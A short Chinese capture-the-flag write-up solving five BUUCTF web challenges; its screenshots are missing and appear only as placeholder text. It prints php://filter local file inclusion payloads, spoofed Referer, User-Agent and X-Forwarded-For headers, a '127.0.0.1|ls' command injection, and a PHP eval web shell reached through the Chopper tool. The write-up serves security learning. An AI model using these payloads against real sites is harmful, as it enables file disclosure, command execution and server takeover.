BUUCTF-Writeup

BUUCTF-Writeup

1.Web-[极客大挑战 2019]Secret File

在这里插入图片描述
把一切都放在那里了,看到奇怪的背景颜色想到可能会在背景隐藏东西试一下Ctrl+A,果然在这里插入图片描述
点击后跳转界面
在这里插入图片描述
我们可以找到在这里插入图片描述但当我们访问action,php时,会直接跳转到end.php,抓包后可得到

在这里插入图片描述
访问可得
在这里插入图片描述利用文件包含漏洞(PHP伪协议)
?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述解码后即可得到flag

2.[ACTF2020 新生赛]Include

在这里插入图片描述点开后发现URL中存在文件包含,题目名字也很直接

我们利用php://filter伪协议进行文件包含
?file=php://filter/read/convert.base64-encode/resource=index.php

?file=php://filter/read/convert.base64-encode/resource=flag.php
即可得到flag

3.[极客大挑战 2019]Http

查看源码找到在这里插入图片描述访问发现

在这里插入图片描述
在http头里添加referer: https://www.Sycsecret.com
在这里插入图片描述修改ua为Syclover在这里插入图片描述添加X-Forwarded-for: 127.0.0.1
即可得到flag{4e871159-20f7-45b8-8212-0eba92f7aa5c}

4.[ACTF2020 新生赛]Exec

读源代码发现在这里插入图片描述输入127.0.0.1|ls发现啥也没过滤
直接cat flag

5.[极客大挑战 2019]Knife

进来后发现很直接暗示我们用菜刀并且告诉了我们密码 eval($_POST[“Syc”]); 打开菜刀直接连接shell即可得到flag